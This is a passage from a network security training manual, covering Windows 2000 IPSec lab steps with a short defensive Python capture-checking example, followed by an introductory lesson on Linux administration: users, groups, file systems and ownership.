10. Click Browse and browse to the IPSec certificate on your course CD-ROM, in the \085545\Data\Certificates folder. You might have to click the Files Of Type drop-down list and select X.509 or *.cer to see the certificate.
11. Select newroot.cer and click Open.
12. Click Next twice, and then click Finish. Click OK.

Note: Perform step 13 through step 22 only if you are designated as Student_Q.

13. Click IP Security Policies On Local Machine.
14. Double-click 7_REQUIRE_AH(sha)+ESP(sha+3des).
15. Select All IP Traffic and click Edit.
16. On the IP Filter List tab, select All IP Traffic, and click Edit. Edit the filter to return the Destination Address to Any IP Address. Click OK, and then click Close.
17. Click the Authentication Methods tab.
18. Click Edit.
19. Select the radio button for Use A Certificate From This CA, and click Browse.
20. Scroll down the list and select SCPR01. Feel free to view and explore the certificate if you like. Click OK.
21. Click OK, and then click Close twice.
22. Verify that the 7_REQUIRE_AH(sha)+ESP(sha+3des) policy is assigned, and close the console.

Note: Perform step 23 through step 37 only if you are designated as Student_P.

23. Click IP Security Policies On Local Machine.
24. Double-click 7_RESPOND_AH(sha)+ESP(sha+3des).
25. Click Edit.
26. Click the Authentication Methods tab.
27. Click Edit.
28. Select the radio button for Use A Certificate From This CA, and click Browse.
29. Scroll down the list and select SCPR01. Feel free to view and explore the certificate if you like. Click OK.
30. Click OK twice, and then click Close.
31. Verify that the 7_RESPOND_AH(sha)+ESP(sha+3des) policy is assigned, and close the console without saving the settings.
32. From the Start menu, choose Settings→Network And Dial-up Connections.
33. Right-click the Partner interface, and choose Properties.
34. Double-click Internet Protocol (TCP/IP).
35. Edit the IP address by subtracting 100 from the last octet. That is, if the IP address is 172.26.10.101, go back to your originally assigned IP address for that interface and make it 172.26.10.1.
36. Click OK twice.
37. Open a command prompt and enter ipconfig to verify the change in your IP address.

Note: Perform the next step only if you are designated as Student_Q.

38. Activate Network Monitor, and start a capture.

Note: Perform step 39 through step 42 only if you are designated as Student_P.

39. At the command prompt, enter ftp IP_address_of_Student_Q. You should be able to successfully ftp to Student_Q. If the ftp attempt does not work, skip the next three steps.
40. Log on as anonymous with no password.
41. Enter dir to see a list of files hosted on the ftp site.
42. Exit the ftp session.

Note: Perform the rest of this task only if you are designated as Student_Q.

43. In Network Monitor, stop and view the capture.
44. Verify that ISAKMP negotiations took place, and then close Network Monitor.

Disabling IPSec

Now that you have examined and implemented various forms of IPSec, you need to turn IPSec off to ensure that the remainder of the tasks throughout the course will run smoothly, and with no issues.

TASK 2E-11
Removing IPSec

Note: Perform this task on all student machines.

1. Open the ipsec.mmc.msc.
2. Verify that all IPSec policies are listed as Unassigned. If a policy is still assigned, unassign it now.
3. Close the console, saving changes if you like.
4. In the Network And Dial-up Connections Control Panel, right-click the Classroom Hub interface, and choose Enable.
5. Right-click the Partner interface, and choose Disable.
6. Ping an IP address elsewhere in the classroom to be sure you have the proper connectivity.
7. Close all open windows.

Verify that all students have completed this task before you proceed, or the remaining tasks might not work as expected.
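The checks made by eye in the Network Monitor steps of the preceding tasks (no ISAKMP and no ESP in the plaintext case; ISAKMP negotiation present once certificates work) can be written down as a rule over a frame summary. The following Python is an added example, not course code or Network Monitor output: the one-line frame format "source destination protocol [sport dport]" is an assumption, and both capture samples are constructed to resemble what the two tasks produce.

```python
"""Added example (not from the course): decide from a capture summary whether
traffic between two peers was negotiated and protected by IPSec. The one-line
frame format 'src dst proto [sport dport]' is an assumption, and both captures
below are constructed, not real Network Monitor output."""
from dataclasses import dataclass
from typing import List, Optional

ISAKMP_PORT = 500   # ISAKMP negotiates over UDP port 500


@dataclass
class Frame:
    src: str
    dst: str
    proto: str                  # "TCP", "UDP", "ICMP", "ESP" (IP protocol 50) or "AH" (51)
    sport: Optional[int] = None
    dport: Optional[int] = None


def parse_capture(text: str) -> List[Frame]:
    """Parse constructed summary lines; protocols without ports carry three fields."""
    frames = []
    for line in text.strip().splitlines():
        parts = line.split()
        if len(parts) not in (3, 5):
            raise ValueError(f"unexpected frame summary: {line!r}")
        sport, dport = (int(parts[3]), int(parts[4])) if len(parts) == 5 else (None, None)
        frames.append(Frame(parts[0], parts[1], parts[2], sport, dport))
    return frames


def assess_peers(frames: List[Frame], host_a: str, host_b: str) -> dict:
    """What the analyst looks for: an ISAKMP exchange, AH/ESP frames, and any
    application traffic that crossed in the clear between the two peers."""
    pair = {host_a, host_b}
    report = {"isakmp": False, "ah": False, "esp": False, "plaintext": []}
    for f in frames:
        if {f.src, f.dst} != pair:
            continue                          # some other conversation
        if f.proto == "UDP" and ISAKMP_PORT in (f.sport, f.dport):
            report["isakmp"] = True
        elif f.proto == "AH":
            report["ah"] = True
        elif f.proto == "ESP":
            report["esp"] = True
        else:                                 # anything else is readable on the wire
            report["plaintext"].append(f"{f.proto} {f.src}->{f.dst}:{f.dport}")
    # Protected means a negotiation happened AND data was carried inside AH/ESP.
    report["protected"] = report["isakmp"] and (report["ah"] or report["esp"])
    return report


# Constructed capture for Task 2E-9 steps 30-31: the filter missed, so FTP went in the clear.
CAPTURE_PLAINTEXT_FTP = """
172.26.10.101 172.26.10.2 TCP 1045 21
172.26.10.2 172.26.10.101 TCP 21 1045
"""

# Constructed capture for Task 2E-10 steps 43-44: certificate authentication
# succeeded, ISAKMP negotiated, then AH-wrapped frames carried the FTP session.
CAPTURE_PROTECTED = """
172.26.10.1 172.26.10.2 UDP 500 500
172.26.10.2 172.26.10.1 UDP 500 500
172.26.10.1 172.26.10.2 AH
172.26.10.2 172.26.10.1 AH
"""

if __name__ == "__main__":
    print(assess_peers(parse_capture(CAPTURE_PLAINTEXT_FTP), "172.26.10.101", "172.26.10.2"))
    print(assess_peers(parse_capture(CAPTURE_PROTECTED), "172.26.10.1", "172.26.10.2"))
```

The plaintext list is the part worth keeping in a real review: a negotiation that happened but left application traffic visible would mean the policy negotiated with one peer while a filter let another peer's traffic through, exactly the situation Task 2E-9 set up.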

Summary
In this lesson, you worked with a Microsoft Management Console (MMC). You configured an MMC and viewed the default or built-in IPSec policies. You then created custom IPSec policies. You implemented and tested these policies. You also took a first look at implementing filter lists and experimented with a couple of authentication methods: preshared keys and certificates.

Lesson Review

2A What are the two protocols in IPSec that are used to protect network traffic?
The Encapsulating Security Protocol (ESP) and the Authentication Header (AH).

What are the two main modes of implementation for IPSec?
Transport Mode and Tunnel Mode.

If you are going to set up a VPN with IPSec, what mode will you probably use?
Tunnel Mode.

2B What are the three default IPSec policies in Windows 2000?
Server (Require Security), Server (Request Security), and Client (Respond Only).

What integrity algorithms are supported in Windows 2000 IPSec?
MD5 and SHA-1.

What encryption algorithms are supported in Windows 2000 IPSec?
DES and 3DES.

2C What authentication methods are supported in the Windows 2000 implementation of IPSec?
Kerberos, Certificates, and Preshared Keys.

What are the default key lifetimes?
A new key is generated for every 100 MB of data exchanged between the two IPSec devices or every 15 minutes, whichever is earlier.

2D What protocol and port are used by ISAKMP during the negotiation process?
UDP and Port 500.

In Transport Mode, while AH ensures the integrity of the entire IP datagram, ESP can be used to ensure the confidentiality and integrity of the payload (or data).

2E When would ESP's integrity check be most usefully employed?
When implementing IPSec in Tunnel Mode. ESP's integrity check at the tunnel endpoint will ensure the integrity of the payload (including the encapsulated packet, internal IP headers, and all other data).

Using filters, it is possible to explicitly control IPSec traffic.

LESSON 3
Hardening Linux Computers

Overview
In this lesson, you will be introduced to the core operation of Linux, specifically Red Hat Linux version 8.0. You will examine the process of securing files and directories, and securing user accounts and passwords. You will secure services and network connections, and disable unneeded services. The lesson will end with the implementation of SSH for secure communication and the functioning of Bastille, for total system hardening.

Data Files: none
Lesson Time: 8 hours

Objectives
In this lesson, you will:

3A Perform fundamental Linux administration.
You will navigate in Linux to create users, groups, files, and directories. You will modify their properties, and identify system information.

3B Configure fundamental Linux security.
You will create file and directory permissions, secure user passwords, and implement Pluggable Authentication Modules (PAMs).

3C Secure access to Linux services.
You will secure access to services by configuring and implementing TCP wrappers and xinetd.

3D Configure network services.
You will use the Network File System and Samba as network services, and examine methods of securing these services.

3E Harden Linux.
You will secure the system startup and shutdown processes, examine Linux logging, implement Tripwire, and lock the machine with Bastille.

Lesson 3: Hardening Linux Computers 137

Topic 3A
Introduction to Linux Administration

Open-source Criteria

No discussion on Linux would be complete without a mention of open-source software. Open-source software does not mean merely that access is available to the source code of the application. Open-source software is defined by the Open Source Initiative (www.opensource.org/) as having 10 different criteria that must be met to be considered open source. These criteria include distribution, license, source code, and redistribution issues. The following list, from the Open Source Initiative, describes the general open-source criteria.

1. Free redistribution: The license on the software must not restrict anyone from selling or giving away the software. The license is not to require a fee or royalty for distribution.
2. Source code: The software must include the source code, along with the compiled software. The code is to be in a format preferred by programmers who would use it to modify the program.
3. Derived works: The license on the software must allow for modifications and creation of derived works, which must in turn be made available using the same terms as the license on the original software.
4. Integrity of the author's source code: The license on the software is allowed to restrict the distribution of the source code if the license allows for the distribution of patch files with the source code, for the purpose of modifying the software at build time. The license may require any Derivative Works to use a different name and/or version number from the author's original software.
5. No discrimination against persons or groups: The license on the software must not discriminate against any person or group of persons.
6. No discrimination against fields of endeavor: The license on the software must not restrict use of the software in any field of endeavor.
7. Distribution of license: The rights on the software must apply to all to whom the software is redistributed, without execution of new or additional licenses.
8. License must not be specific to a product: The license on the software must not be dependent on the software being part of a specific software distribution.
9. License must not restrict other software: The license on the software must not place any restrictions on other software that is distributed along with the licensed software.
10. License must be technology-neutral: No provision of the license may be predicated on any individual technology or style of interface.

Linux
Linux is an operating system (OS) similar to UNIX, originally created by Linus Torvalds, with programming help from around the world. Linux is developed under the GNU General Public License. The GNU Public License is a full legal document, which addresses the points raised under the general guidelines of the Open Source Initiative. The GNU document can be found at www.linux.org/info/gnu.html. Linux itself can be found in many variations today. Although the source code is available to be downloaded and used at will, there are many packages of Linux that are not distributed for free. These organizations are able to charge money for their distribution of Linux, provided that the source code is always released and available. Some of the Linux distribution packages include Red Hat, SuSE, Caldera, and MandrakeSoft.

Linux is developed to run on personal computers, but it can run on many platforms other than the PC. Linux has been ported, or modified, to run on the following platforms: PowerPC, Macintosh, DEC Alpha, Sun Sparc, and others. Linux has POSIX compatibility in order to interoperate with other UNIX-like computers.

In this lesson, the Linux distribution used is Red Hat 8.0.

The Kernel
When Linux is turned on, it loads and runs the core operating system program, which is called the kernel. The core operating system is then designed to run the other applications on the computer. The kernel is always under development, and is always available in both a stable release and a testing release.

A major benefit of the design of Linux is that the kernel is modular. This means that the individual components of the kernel can be easily updated and modified as new research dictates.

The Graphical Interfaces
Most people who work with Linux are comfortable with using the command-line interface to work with the operating system. However, as Linux continues to gain mainstream use, the inclusion of graphical interfaces has become an additional feature that users enjoy.

There are many different graphical interfaces in Linux. These interfaces are often referred to as window managers. Popular graphical interfaces are the K Desktop Environment (KDE) and the GNU Network Object Model Environment (GNOME). These window managers provide users with point-and-click and drag-and-drop functionality and create user-friendly environments.

Basic Navigation in Linux
In order to use Linux, and to follow the tasks in this lesson, you will need to become familiar with some of the fundamental terms and phrases. These common terms are quickly defined as follows, and will be discussed in more detail where they come into the text of the lesson.

Shell prompt (Terminal Window): A command-line interface that functions as a go-between between the user and the operating system.
Command line: The actual location in the shell prompt where a user will enter commands to the operating system.
Panel: A toolbar, often found across the bottom of the screen, which contains buttons and shortcuts to often-used applications.
Root: A user account created during the installation of the operating system. Root has complete access to the system. There are applications that must be run using the root account. The root account has similarities to the Administrator account in Windows or the Supervisor account in Novell. As root has complete control over the system, care must be taken that the account is properly secured. This account is sometimes referred to as the superuser account.
su: The su command enables a user to substitute another user account, such as the root account, without initially logging in as root. This allows for the running of applications that require root access from a shell prompt, while logged in as a non-root user.
Man page: The abbreviated way of saying manual page. The man pages are the information about a command. For example, to learn about the function and/or use of the su command, invoking the command man su at the command line shows the information about the su command. To close a man page, press the Q key.
X or X Windows: The GUI environment in Linux. When using X Windows, you are simply using the GUI instead of the pure command-line function of a console.

Logging In
Logging in to Linux requires authentication, just as in any other modern operating system. When first using the system, you are required to log in as root. Once you are in the system, you should create user accounts as needed for the users of the system. User account names are case-sensitive, so ROOT and root are two different accounts. The default root account is all lower-case. A password is created for the root account during the installation of the operating system. During the installation, Red Hat provides the option of logging in to either the text mode or the graphical mode of operation. If the system is configured to use text mode, after you enter your credentials, you will remain in the text mode of operation. To switch into the graphical user interface, you can enter the startx command, provided that X Windows has been properly configured on the machine.

The GUI
As mentioned earlier, there are several different window managers, such as KDE and GNOME. For this lesson, the GNOME GUI is the one that will be used. An example of a freshly installed GNOME desktop is shown in Figure 3-1.

Figure 3-1: The GNOME desktop on a new install of Red Hat Linux.

The primary components of the GNOME desktop are panels, menus, windows, workspaces, Nautilus File Manager, Desktop Background, and the Main Menu (sometimes called the Start Here location). There can be several panels on the desktop, although the starting configuration of GNOME is to have one panel (called the menu panel) across the bottom.

Menus can provide access to nearly all the files and functions of the system. Menus can be accessed from the menu panel by clicking the Main Menu.

The Main Menu is where you can access applications, make system configuration changes, find files, and more. In the Red Hat 8 distribution, the Red Hat icon, with the small triangle, is the Main Menu. In other installs of GNOME, the Main Menu is a footprint icon.

The Desktop Background component is located behind all the other components on the desktop, and is an active part of the user interface. Objects can be placed on the Desktop Background for quick access, and by right-clicking anywhere on an open portion of the Desktop Background, you can open a menu to open different programs, such as a Terminal.

Workspaces provide the user the ability to have separate working desktops. You can open several windows in one workspace, for example, and then use the Workspace Switcher to switch to another workspace with no open windows. Figure 3-2 highlights these features of GNOME, showing two open workspaces.

The Nautilus File Manager is the access point to files and directories in the GUI. You can display the contents of a file within a Nautilus window, or you can open the file with a different application from Nautilus.

Figure 3-2: Desktop components highlighted on a Red Hat Linux system.

Terminal Window
Although much of the administration of the Linux computer can be done by using a GUI, there are many people who will use the Terminal Window for much, if not all, of their administration. Similar in nature to the DOS (or command) prompt on a Windows machine, the Terminal Window is where you can enter commands to be executed by the computer.
Figure 3-3: A blank Terminal Window opened in Red Hat 8.

Common Commands
Because many of the tasks in this lesson will be performed in the Terminal Window, it is important for you to become familiar with the Terminal Window and some frequently used commands. Recall that in Linux, file names, directory names, and commands are case-sensitive. When you are logged into the Linux machine, you will see the following prompt: [root@rh /]#. This is an indicator of the user account logged in (in this case, root) and the computer name (in this case, rh), along with the current directory (in this case, /). The following table lists only a small grouping of the many commands in Linux, but you should become comfortable with all of them, including their functions.

Common Linux Commands (2 slides): If students are interested and time permits, lead a short discussion that focuses on comparing these Linux commands to their Windows and DOS counterparts.

Linux Notation or Command: Description
/: Root directory.
./: Current directory.
../: Parent directory.
cat: The catalog command lists the contents of a file. Common use: cat <filename>
cd: The change directory command changes the current directory. Common use: cd <directory_name>
cp: The copy files command copies a file to a specified destination. Common use: cp <source_filename> <destination_filename>
echo $PATH: The echo $PATH command lets you see your current path, or the directories in which the system will search for executables.
export: The export command shows the current OS environment variables.
history: The history command shows the command history of the terminal session, up to 500 commands. You can see a shorter list, though; for example: history 10
ifconfig: The ifconfig command shows your current TCP/IP configuration.
kill: The kill command ends a running process. Common use: kill <PID>, where PID is the Process ID.
ls: The list command shows the contents of a directory. Common use: ls <directory_name>
ls -al: Using the -al option with the list command shows the contents of a directory, including the system files, in long format.
ls -l: Using the -l option with the list command shows the contents of a directory in long format.
man: The manual command opens manual pages (the file documentation) for a specified command. Common use: man su
mkdir: The make directory command creates a new directory. Common use: mkdir <directory_name>
mv: The move command moves files and/or directories. Common use: mv <current_filename> <new_filename>
passwd: The password command changes your password.
ps: The process status command lists the running processes and their Process IDs.
pwd: The print working directory command lists the full path of your current working directory. It does not list the contents of the directory.
rm: The remove command deletes a specified file. Common use: rm <filename>
rm -r: Using the -r option with the remove command deletes a directory and all of its contents. Common use: rm -r <directory_name>
rmdir: The remove directory command deletes an empty directory. Common use: rmdir <directory_name>
shutdown: The shutdown command shuts down the system.
touch: The touch command creates a file. Common use: touch <filename>

In addition to the commands listed, you might want to use the keyboard shortcuts that are available. Some of the common shortcuts are listed in the following table.

Key Combination: Effect
Ctrl+Alt+Backspace: Kill X. Kills the current X session, and returns to the login screen (used if the normal exit does not work). This key combination works only in the GUI.
Ctrl+Alt+Delete: Shut down and reboot the system. Shuts down the current session, and reboots the OS (used if the normal shutdown does not work).
Ctrl+D: Log out of a terminal or console session (used instead of entering exit or logout).
Ctrl+Alt+Fx: Switch screens. Ctrl+Alt and any function key, F1 through F7, displays a new screen. F1 to F6 are text screens, while F7 is the GUI.
Up Arrow: Scroll through command history in the Terminal Window.

The following task is designed to walk you through the basic process of using Linux, creating directories and files. You will then copy, move, and delete files. If at any time you would like to see the options for a command, use the -help or -h switch after the main command; for instance, chmod -help. You can also use the man pages to find out more details about any command.

TASK 3A-1
Navigating in Linux

1. Reboot and log on to Red Hat 8 as root, with the password qwerty.
2. If the GUI does not start automatically, enter startx at the command prompt.
3. Right-click anywhere in the Desktop Background, and choose New Terminal.
4. In the Terminal Window, enter cd / to navigate to the top of the directory structure.
5. Enter mkdir lab1 to create a new directory.
6. Create another new directory named lab2 by using the mkdir command.
7. Enter cd /lab1 to change to the lab1 directory.
8. Enter touch file1 to create a file.
9. Enter ls -l to view the detailed contents of the lab1 folder.
10. Enter cp /lab1/file1 /lab2/file2 to copy the file from one directory to the other.
11. Enter ls to verify that file1 is still in the lab1 directory.
12. Change to the lab2 directory by using the cd command.
13. View the contents of the directory by using the ls command.
14. Change back to the lab1 directory.
15. Enter mv /lab1/file1 /lab2 to move the file from one directory to the other.
16. View the contents of the directory.
17. Change to the lab2 directory, and verify that it contains both files.
18. Enter rm file2 to delete (remove) a file. When you are prompted to confirm the removal, enter y.
19. View the contents of the directory.

User and Group Accounts

As with any other modern OS, the person managing the system will need to create user and group accounts for the individuals that require access to the resources of the system. Linux is no different in this regard. User accounts and group accounts are required, and there are several methods that you can use in their creation. User accounts might be used by individual people accessing the system, or they might be used by logical access (or system access). Regardless of whether the user account is for a person or a system process, it will be assigned a User ID (UID) and a Group ID (GID).

Groups are the logical grouping of users that have similar requirements, such as the need for similar file permission assignments. Upon creation, each user account will have a primary group associated with it. When a user account is created, a group of the same name is created, and the user account is the sole member of that group.

In Linux, you can see the current user list by looking at the /etc/passwd file. As we continue farther into this lesson, this file might change, so at this time, you are looking at a default /etc/passwd file. Figure 3-4 shows an example of this file.

Figure 3-4: The default /etc/passwd file on a Linux computer.

In the /etc/passwd file, there are several fields, separated (or delimited) by a colon. These fields describe the individual user account. The following list explains each of these fields:
User Account Name: This is the login name for the user account.
Password: This is the login password for this user account. If the only thing that is on screen is an x, then the password is protected in a shadow password file. (Shadow passwords are discussed later in this lesson.)
User ID: This is a numerical identifier assigned to each user account upon creation. This is sometimes referred to as the UID.
Group ID: This is the numerical identifier associated with the home group to which the user belongs. This is sometimes referred to as the GID.
Full Name: This might be the full first and last name of the user.
Home Directory: This is the default current directory at login time for this user account.
Shell: This is the command interpreter that will load when the user logs into the Terminal interface. If the user logs into the GUI, then this is the shell that loads at the Terminal.

In Linux, user and group accounts are assigned easy-to-remember and easy-to-manage names for the benefit of the users and administrators. To the computer, the significant variables are not the human-readable names, but the numeric identifiers. When a new user is created, it will be assigned the first available UID and GID, starting at 500. The UID and GID numbers increase by one for each new user account created.

Standard Users and Groups
In the Red Hat distribution of Linux, several default user accounts, called standard users, are created during the installation of the OS. These accounts have default UID, GID, home-directory, and shell values. Figure 3-5 shows several of these standard users.

Figure 3-5: Several of the standard user accounts on a Red Hat Linux machine.

The standard accounts can be found in the /etc/passwd file, just as any other account. These are examples of the system accounts, versus the user accounts created for individual access. In addition to the standard user accounts, several standard groups are also created upon installation. These groups can be found in the /etc/group file. Figure 3-6 shows several of the standard groups.

Figure 3-6: Several of the standard groups on a Red Hat Linux machine.

Adding Users and Groups
You can add users and groups to Red Hat Linux from within a Terminal session or from within the GUI. The basic command for adding a user is useradd, followed by the group, then the account name. The new account is locked until you assign a password or configure the account so that the user must assign a password during the first login. So, in the following command sequence, a user account called Linux1 is added to the Users group, with a password of qwerty:

useradd -g Users Linux1
passwd Linux1
New password: qwerty
Retype new password: qwerty

This simple syntax can be used to add a user quickly to the system. Several switches can be used during the creation of the account. Two of note, at this time, are the -d and the -s switches. The -d switch enables you to specify a home directory. If no directory is specified, the user will be assigned a default home directory in the form of /home/useraccountname; for instance, for a user called jkmack, the default home directory would be /home/jkmack. The -s switch enables you to assign a shell to this user. If no shell is specified, the user will be assigned the default shell of /bin/bash.

If you want to add a group to the system by using the command-line syntax, use the groupadd command. With this command, you create the group and the GID at the same time. The switch for dening the GID is -g. If you do not dene a GID during the creation of the group, the system will assign the next available number to the group. So, the following command creates a group called SCNP_Admins, with a GID of 1024:
groupadd -g 1024 SCNP_Admins

Although the command-line method for adding user and group accounts is useful, many administrators are starting to become more comfortable with using the GUI tools that are available. In Red Hat, the GUI tool for adding and working with user and group accounts is called User Manager. To run User Manager, click the Main Menu, then choose System SettingsUsers And Groups.

Figure 3-7: Red Hat Linux User Manager, showing user accounts.

In User Manager, you can see all the user accounts in the system, along with their configurations. If you want to see all the system accounts as well, choose Preferences, and clear the option to filter system users and groups. Selecting the Groups tab enables you to see the group accounts on the system.

Adding a new user in User Manager is a straightforward process. Once you click the Add User button, simply fill in the fields, and click OK. If you want to change the properties of a user account, select the user account, then choose File→Properties. There are four tabs to manage for the user account. They are described in the following list:

• User Data: This tab is where the primary data is located, such as user name, full name, password, and home directory.
• Account Data: This tab provides the option to set the account as locked out or to create an expiration date for the account.
• Password Info: This tab shows when the password was last changed, and can be used to set a limit, in days, before a password change is required.
• Groups: This tab lists the groups that the user belongs to, along with the user's primary group.

Lesson 3: Hardening Linux Computers 149

Adding a new group in User Manager is similar to adding a user account. Once you click the Add Group button, define the group name and GID, if desired; otherwise, the system will assign the next available number for the GID. Once the group is created, you can add users to the group by selecting the group and choosing File→Properties.

Figure 3-8: Red Hat User Manager, showing group accounts.

TASK 3A-2
Creating and Modifying Users and Groups

Setup: You are logged on to Red Hat 8 as root, and a Terminal Window is open.

1. Enter useradd -g users User1 to create a user account with the name User1.
2. Enter passwd User1 to unlock the account and prepare to assign the password. When you are prompted to enter and retype the new password, enter 1resU.
3. From the Main Menu, choose System Settings→Users And Groups to open User Manager. Verify the existence of the new user account. Check the UID assigned.
4. Switch to the Terminal Window, and enter usermod -u 507 User1 to change the UID to number 507.
5. Return to User Manager, click Refresh, and verify that the UID has changed.
6. Switch to the Terminal Window, and enter groupadd -g 510 Testers to create a group called Testers, with a GID of 510.
7. Switch to User Manager, select the Groups tab, and verify that the Testers group is displayed and that the GID is 510. You might need to click the Refresh button to see the change.
8. Switch to the Terminal Window, and enter groupmod -g 515 Testers to change the GID.
9. Switch to User Manager and verify that the GID has changed for the Testers group.
10. Select the Testers group, click the Properties button, and select the Group Users tab.
11. Check User1, then click OK to add the User1 user account to the Testers group.
12. Close User Manager. You will use the Terminal Window in the next task.

Switching User Accounts

The root account must be secured, as it is the one account that has the ability to take complete control of the computer. Any intruder that gains root access has essentially taken control of the computer away from you. For this reason, the root account must be protected at the highest level. You should only log in as root when absolutely required, such as to modify system files or to manage services on the computer.

There are, however, applications that require root-level access to run. So, if you have an application you want to run while administering the machine and the network, what are you to do, if you shouldn't log in as root? The answer is to use the Substitute User command for that specific moment.

The Substitute User (su) command can be run to execute a shell as a different UID and GID than the user you are currently logged on as. The command is simply su <username>. So, if you want to log in as root, use the command su root. You will need to provide the correct password for the root account to gain access; the command alone does not grant access.

The Unified File System of a Linux Computer

Linux, just as any other operating system, has a method for organizing the information held in files and directories. In Linux, the file system is viewed differently than in Windows. The Linux file system is a combination of all partitions, directories, storage devices, and files. Storage media are not outside components of the file system; they are added as an integral part of the file system, and removed when no longer required. This is considered a unified file system, where parts of the file system can reside on different, and unique, physical media. Figure 3-9 shows the unified file system of a Linux computer.

Figure 3-9: The unified file system of a Linux computer.

One thing you may notice right away is that there are no drive letters in the file system. The drive letters that are assigned to partitions in Windows do not exist here, so there is no C drive, D drive, and so on. In Linux, for a partition to be noticed by the system, the system must be told of the existence of the partition, but files are not accessed based on the physical structure of the drive. All files are accessed in the logical, unified file system.

Another difference that Windows users will notice is that there is no concept of the 8.3 file naming convention that many are used to. Linux file names can be up to 256 characters long, and they are case-sensitive. Therefore, these three words represent three different files: FILE, File, file. It is also not uncommon for Linux files to have what appear to be multiple extensions. A common example of this would be scp_file.tar.gz.

Device Names and Locations

Now that you have been introduced to the concept of the logical unified file system, you need to examine the structure of physical disks, and how Linux views partitions. Hard disk drives and floppy disk drives have predefined device names in Linux. The following table shows the Linux location and description of the predefined devices.

Location    Description
/dev/hda    First (Primary) IDE hard disk drive
/dev/hdb    Second (Secondary) IDE hard disk drive
/dev/sda    First SCSI hard disk drive
/dev/sdb    Second SCSI hard disk drive
/dev/fd0    First floppy disk drive
/dev/fd1    Second floppy disk drive

Disks and Partitions

As previously mentioned, Linux does not use partitions as Windows operating systems do. There are no assigned drive letters for partitions. In Figure 3-10, you will see that there are two hard disks, each with a partition defined. Disk 1 is the physical storage for several of the directories, and Disk 2 is the physical storage for other directories.

Figure 3-10: Partition structure in the unified file system.

Users of this computer will not be able to identify the two disks when they are looking at the contents of the root directory. The only place where the physical structure is visible will be in the /dev directory. In this directory, the hard disks and partitions are defined as shown in this table.

Location     Description
/dev/hda1    First hard disk, first partition
/dev/hda2    First hard disk, second partition
/dev/hdb1    Second hard disk, first partition
/dev/hdb2    Second hard disk, second partition

Mounting Devices

Devices in the Linux file system are found in the unified file system just as any other object that needs to be accessed. However, in order for these devices to be accessed, they must be mounted. Mounting a device is the process of making that device available to the file system.

For example, suppose you wanted to access a CD-ROM. You would first need to mount the CD-ROM drive to the file system. To do this, use the mount command, as shown here:

mount /dev/cdrom /mnt/cdrom

If you were to enter this command, you would see the following output:

Mount: block device /dev/cdrom is write-protected. mounting read-only

Using the mount command as shown will allow the device /dev/cdrom to be accessed in the /mnt/cdrom directory, using the unified file system. The output response indicates that the device has been mounted, and is listed as a read-only device. Because the structure of the file system is logical, you can change the default nature of mounting devices as described. For example, the default action of mounting a CD-ROM drive is to have the mount point be /mnt/cdrom. However, if you wanted to change this, you could. If you wanted the CD-ROM to be accessed right off the root directory, you could add a directory and point the CD-ROM device to that directory. The following commands are all that will be required to make the CD-ROM accessible in this manner:

mkdir /cdrom
mount /dev/cdrom /cdrom

Using these two commands, you will be able to access the contents of a CD-ROM disc at the /cdrom prompt. If you want to change the location of a device that has been previously mounted, you first need to unmount that device. To unmount a device, such as the CD-ROM drive, use the umount command, as shown here:

umount /dev/cdrom

Inodes

Every file in the file system is described by a block of data called an inode. You will see inode defined as both Information Node and Index Node, depending on the text you are reading. Here, we will refer to it simply as inode. Similarly, although on a larger scale, the entire file system is described by a block known as the super block. The super block contains information about the file system, including the overall size of the file system and the number of inodes.

This section focuses on the inode of an individual file, and its structure. The data in a file's inode contains the following:

• File ownership information.
• File access and type information, otherwise known as the mode.
• Time the file was last modified.
• Time the file was last accessed.
• Time the inode itself was updated.
• File size in bytes.
• File address in physical blocks.

In the list of items in the inode, you will not find the file name and directory location. Those pieces of information are found in the directory itself, which maps file names to inodes. All that the file system is concerned with is the inode number associated with a file; the name is somewhat irrelevant. The number of an inode is associated when a file is first saved to a block on the file system. During formatting, blocks of equal size are created, each with an associated number for identification.

To view the inode numbers associated with files, you use the ls -i command.

File Structure

Earlier you used the ls command to list the contents of a directory. You might have noticed much more information than just the file name in the output from this command. All files in Linux are associated with a user and a group. Take the following file example:

-rwxrw-r-- 1 User1 Testers 512 Oct 24 19:42 firstdoc.txt

You might assume that the output was created by issuing the ls -l firstdoc.txt command. Remember that the -l switch on the ls command shows the complete listing for the object; in this case, the firstdoc.txt file. Here is a breakdown of what the output is defining (the description of the field, followed by the output in the example):

• File Access Permission: -rwxrw-r--
• Number of Links: 1
• File Owner: User1
• Group: Testers
• File Size (bytes): 512
• Last Modification Date: Oct 24
• Last Modification Time: 19:42
• File name: firstdoc.txt

Although the permissions will be discussed in detail later, at this moment there is one section of the File Access Permissions that will be detailed. The first character of the permissions is not technically a permission; rather, it has a special meaning. The first character can define any one of the following:

• If the first character is a dash (-), then the object is a normal file.
• If the first character is the letter d, then the object is a directory.
• If the first character is the letter l, then the object is a symbolic link to another file.
• If the first character is the letter b, the object represents a block device, such as a disk drive.
• If the first character is the letter c, the object represents a character device, such as a serial port.

A symbolic link is a link that points to another file, similar to a Windows shortcut. A symbolic link does not contain data; it only refers to another target file, in another location. The other location can be on the same computer, or on another machine entirely across the network. The following two lines show how a symbolic link can be used. The first line is the link, which points to the file found on the second line. Accessing the link on the first line will display the file of the second line.

lrwxrwxrwx 1 User1 Testers Oct 24 19:42 sales -> march.tar
-rwxrw-r-- 1 User1 Testers 2048 Oct 24 19:42 march.tar

TASK 3A-3
Viewing File Details

Setup: You are logged on to Red Hat 8 as root, and a Terminal Window is open.

1. If necessary, change to the lab2 directory.
2. Enter ls -l to view the details of the file you made earlier.
3. Observe the structure of the file in the directory, paying particular attention to the owner, group, access times, and file size.

Object Ownership

As you saw in the file structure, every file has an associated group and a file owner. By default, when you create a new file in your home directory, you will be the owner, and your primary group will be the assigned group for that file. There may be instances, however, where you will need to change the owner of an object, such as a file, to allow others to manage the object.

The only user account that can change the ownership of a file is the root account. In addition to changing a file's ownership, the root account can change the ownership of a directory. The command for changing the ownership of a file is chown <new owner> <filename>. So, in the following example, a file called payroll.doc is having the user account vp_finance assigned as the new owner:

chown vp_finance payroll.doc

If you want to assign a new group to the object, the command is similar. The only difference is to add the user account, then a decimal point and the group. In the following example, the file called payroll.doc is having the user account vp_finance and the group account accounting assigned as the new owners:

chown vp_finance.accounting payroll.doc

In the event that the requirement is to change the ownership of a directory, and all the files or directories inside that directory, then the command is chown with the -R switch. The first example will change the ownership of the /marketing/June directory to have the marketing group as the owner and vp_marketing as the user. The second example does not change the user of the object, but changes the group:

chown -R vp_marketing.marketing /marketing/June
chown -R .marketing /marketing/June

